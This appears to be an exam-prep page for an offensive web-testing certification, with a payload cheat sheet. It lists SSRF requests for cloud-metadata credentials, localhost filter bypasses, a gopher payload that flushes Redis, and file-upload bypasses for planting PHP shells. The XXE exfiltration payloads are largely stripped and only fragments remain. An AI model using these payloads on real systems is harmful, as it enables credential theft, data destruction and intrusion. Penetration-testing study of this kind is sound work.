OSWA
OffSec

Offensive Security Web Assessor

Intermediate 48hr practical + report Pass: 100+ points $1,499

Web application penetration testing — SQL injection, XSS, SSRF, deserialization.

Official Page
IssuerOffSec
Format48hr practical + report
Duration72 hours total
Pass Score100+ points
Valid For3y
Overview Syllabus (7) Tools (7) Cheat Sheets (1) Labs (1)
Cheat Sheets
Injection Attack Payloads

XXE Payloads



]>
&xxe;


]>



  %xxe;
]>


">
%eval;%exfil;

SSRF Payloads & Bypasses

# Cloud metadata
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
http://169.254.169.254/metadata/instance?api-version=2021-02-01

# 127.0.0.1 bypasses
http://0/ http://0.0.0.0/ http://127.1/
http://[::] http://[::1]/
http://①②⑦.①/ (Unicode)
http://0x7f000001/ http://2130706433/
http://127.127.127.127/

# Gopher for Redis
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A

# SSRF to internal scan
http://internal.corp/admin
http://localhost:8080/actuator/env

File Upload Bypass Reference

# Extension bypass
.php → .php5 .phtml .phar .php7 .shtml .pwml
# Double extension: shell.jpg.php
# Null byte: shell.php%00.jpg

# MIME bypass (in Burp, change Content-Type:)
image/jpeg, image/png, image/gif

# Magic bytes (prepend to file)
JPEG: \xFF\xD8\xFF
PNG:  \x89PNG\r\n\x1a\n
GIF:  GIF89a

# .htaccess upload to enable PHP
echo "AddType application/x-httpd-php .jpg" > .htaccess
# Upload then shell.jpg
For blind XXE/SSRF, use interactsh-client or Burp Collaborator to detect out-of-band DNS/HTTP callbacks.